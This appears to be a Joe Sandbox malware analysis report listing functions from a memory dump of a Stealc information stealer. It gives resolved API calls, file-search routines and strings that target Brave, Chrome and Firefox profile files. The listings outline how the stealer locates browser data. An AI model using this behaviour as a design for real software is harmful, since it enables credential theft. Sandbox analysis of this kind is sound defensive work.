Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 20c634bf3e33caebd29d8938b5858cf9388b708508f5867718af45db11b1469a
Instruction ID: 1238557a0d18ff25bb9a33862678ac9aef70c02f196d860244de907c970dbd22
Opcode Fuzzy Hash: 20c634bf3e33caebd29d8938b5858cf9388b708508f5867718af45db11b1469a
Instruction Fuzzy Hash: CC41CFB1640604EBC715BFE4DC8DADD7B77AF4A70AB429040F60299190CAF2A5E1DF31

Function 006A9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00A03AC0), ref: 006A98A1
GetProcAddress.KERNEL32(75900000,00A03838), ref: 006A98BA
GetProcAddress.KERNEL32(75900000,00A03A78), ref: 006A98D2
GetProcAddress.KERNEL32(75900000,00A038E0), ref: 006A98EA
GetProcAddress.KERNEL32(75900000,00A037F0), ref: 006A9903
GetProcAddress.KERNEL32(75900000,00A01328), ref: 006A991B
GetProcAddress.KERNEL32(75900000,009FAE20), ref: 006A9933
GetProcAddress.KERNEL32(75900000,009FAEE0), ref: 006A994C
GetProcAddress.KERNEL32(75900000,00A03A90), ref: 006A9964
GetProcAddress.KERNEL32(75900000,00A03850), ref: 006A997C
GetProcAddress.KERNEL32(75900000,00A03AA8), ref: 006A9995
GetProcAddress.KERNEL32(75900000,00A037D8), ref: 006A99AD
GetProcAddress.KERNEL32(75900000,009FAF80), ref: 006A99C5
GetProcAddress.KERNEL32(75900000,00A03820), ref: 006A99DE
GetProcAddress.KERNEL32(75900000,00A03868), ref: 006A99F6
GetProcAddress.KERNEL32(75900000,009FAE40), ref: 006A9A0E
GetProcAddress.KERNEL32(75900000,00A03880), ref: 006A9A27
GetProcAddress.KERNEL32(75900000,00A03898), ref: 006A9A3F
GetProcAddress.KERNEL32(75900000,009FAF60), ref: 006A9A57
GetProcAddress.KERNEL32(75900000,00A03B98), ref: 006A9A70
GetProcAddress.KERNEL32(75900000,009FAF00), ref: 006A9A88
LoadLibraryA.KERNEL32(00A03AD8,?,006A6A00), ref: 006A9A9A
LoadLibraryA.KERNEL32(00A03AF0,?,006A6A00), ref: 006A9AAB
LoadLibraryA.KERNEL32(00A03B08,?,006A6A00), ref: 006A9ABD
LoadLibraryA.KERNEL32(00A03B68,?,006A6A00), ref: 006A9ACF
LoadLibraryA.KERNEL32(00A03B20,?,006A6A00), ref: 006A9AE0
GetProcAddress.KERNEL32(75070000,00A03B80), ref: 006A9B02
GetProcAddress.KERNEL32(75FD0000,00A03B50), ref: 006A9B23
GetProcAddress.KERNEL32(75FD0000,00A03B38), ref: 006A9B3B
GetProcAddress.KERNEL32(75A50000,00A03F58), ref: 006A9B5D
GetProcAddress.KERNEL32(74E50000,009FAF20), ref: 006A9B7E
GetProcAddress.KERNEL32(76E80000,00A01338), ref: 006A9B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 006A9BB6

Strings

NtQueryInformationProcess, xrefs: 006A9BAA

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 8f22a602f135059826f9d293958458230c9651aaf97789bf704b012c12253815
Instruction ID: 1bd45dde8bb29b977586d0184707eef98793eb8730a4ec1a61e87fa801f861ab
Opcode Fuzzy Hash: 8f22a602f135059826f9d293958458230c9651aaf97789bf704b012c12253815
Instruction Fuzzy Hash: D9A17CB56022419FD34CEFA8FD8896637F9F74C301734472BAA45C3264DB399941DB26

Function 0069BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,006B0B32,006B0B2B,00000000,?,?,?,006B13F4,006B0B2A), ref: 0069BEF5
StrCmpCA.SHLWAPI(?,006B13F8), ref: 0069BF4D
StrCmpCA.SHLWAPI(?,006B13FC), ref: 0069BF63
FindNextFileA.KERNELBASE(000000FF,?), ref: 0069C7BF
FindClose.KERNEL32(000000FF), ref: 0069C7D1

Strings

Google Chrome, xrefs: 0069C634
\Brave\Preferences, xrefs: 0069C1DB
Preferences, xrefs: 0069C11E
Brave, xrefs: 0069C102

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 61d771765b43300614504d5d4bf81563347fa714a06fb0802f49ea6d305656eb
Instruction ID: 907bcddabd7be63391425107170f1cb041b3818e40ffaf6835fa826e699cad55
Opcode Fuzzy Hash: 61d771765b43300614504d5d4bf81563347fa714a06fb0802f49ea6d305656eb
Instruction Fuzzy Hash: 36425272910104ABCF94FBA0DD96EEE737EAB85300F40455DB90A96181EF349F49CFA6

Function 6C0C35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C14F688,00001000), ref: 6C0C35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0C35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C0C35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C0C363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C0C369F
__aulldiv.LIBCMT ref: 6C0C36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C0C3773
EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0C377E
LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0C37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C0C37C4
EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0C37CB
LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0C3801
__aulldiv.LIBCMT ref: 6C0C3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C0C3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C0C3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C0C394C

Strings

MOZ_TIMESTAMP_MODE, xrefs: 6C0C35DB
QPC, xrefs: 6C0C38FC
GTC, xrefs: 6C0C3912
AuthcAMDenti, xrefs: 6C0C3946
GenuntelineI, xrefs: 6C0C3639

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: acf2d660369a98a9bade5f117d320b60ffc2665daf7f59ca01187a4f292f135e
Instruction ID: e6022f04959a744332ad2b738d8e8d288b8ae2084cc3440ee32445e7400e6a7c
Opcode Fuzzy Hash: acf2d660369a98a9bade5f117d320b60ffc2665daf7f59ca01187a4f292f135e
Instruction Fuzzy Hash: CAB1B3B1B193109BDB08EF28C444B5ABBF5FB8E708F04C92DE999D3790D77099059B82

Function 006A4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 006A492C
FindFirstFileA.KERNEL32(?,?), ref: 006A4943
StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
FindClose.KERNEL32(000000FF), ref: 006A4B92

Strings

%s\*, xrefs: 006A4920
%s\%s, xrefs: 006A49A4
%s\%s, xrefs: 006A49FB

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: bb27c2c32b11e1f50c467e4f1d6054c9ee0b5c2d5c92b6f75479ce75f102b1fe
Instruction ID: e7af09bcc0e978bf090a0b3b81245dfb338b62147468584e5292ac1bf5f4bf98
Opcode Fuzzy Hash: bb27c2c32b11e1f50c467e4f1d6054c9ee0b5c2d5c92b6f75479ce75f102b1fe
Instruction Fuzzy Hash: 156153B1900218ABCB24EBA0DC45EFB777DBB89700F04869DB50996141EF75EB85CFA1

Function 006A3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 006A3EC3
FindFirstFileA.KERNEL32(?,?), ref: 006A3EDA
StrCmpCA.SHLWAPI(?,006B0FAC), ref: 006A3F08
StrCmpCA.SHLWAPI(?,006B0FB0), ref: 006A3F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 006A406C
FindClose.KERNEL32(000000FF), ref: 006A4081

Strings

%s\%s, xrefs: 006A3EB7

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: ae0fc533bb100c4c52711f0722243adce8b7cfca1e316d57a390121e0a7a8ce6
Instruction ID: 7340711d45537928c68b28568ad0fa737948d98c5aa643446a137ccb8e4546d9
Opcode Fuzzy Hash: ae0fc533bb100c4c52711f0722243adce8b7cfca1e316d57a390121e0a7a8ce6
Instruction Fuzzy Hash: 545164B2900218ABCB24FBB0DC85EFA737DBB45300F00469DB65996150EB75EB85CF95

Function 0069F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B15B8,006B0D96), ref: 0069F71E
StrCmpCA.SHLWAPI(?,006B15BC), ref: 0069F76F
StrCmpCA.SHLWAPI(?,006B15C0), ref: 0069F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0069FAB1
FindClose.KERNEL32(000000FF), ref: 0069FAC3

Strings

prefs.js, xrefs: 0069F812

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 123485ff760339a81ab7bfa51f0110c43b8566d93e2fb528e7aaa03153b3fdde
Instruction ID: b5cfb7fe95220b7486b933b468c914af5e9bc576d49a8229cb698dacd42630bf
Opcode Fuzzy Hash: 123485ff760339a81ab7bfa51f0110c43b8566d93e2fb528e7aaa03153b3fdde
Instruction Fuzzy Hash: E3B155719001089FDBA4FFA0DC55AEE737AAF55300F5085ADA40A9B181EF34AF49CF96

Function 006916D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B5124,?,00691F2C,?,006B51CC,?,?,00000000,?,00000000), ref: 00691923
StrCmpCA.SHLWAPI(?,006B5274), ref: 00691973
StrCmpCA.SHLWAPI(?,006B531C), ref: 00691989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00691D40
DeleteFileA.KERNEL32(00000000), ref: 00691DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00691E20
FindClose.KERNEL32(000000FF), ref: 00691E32

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

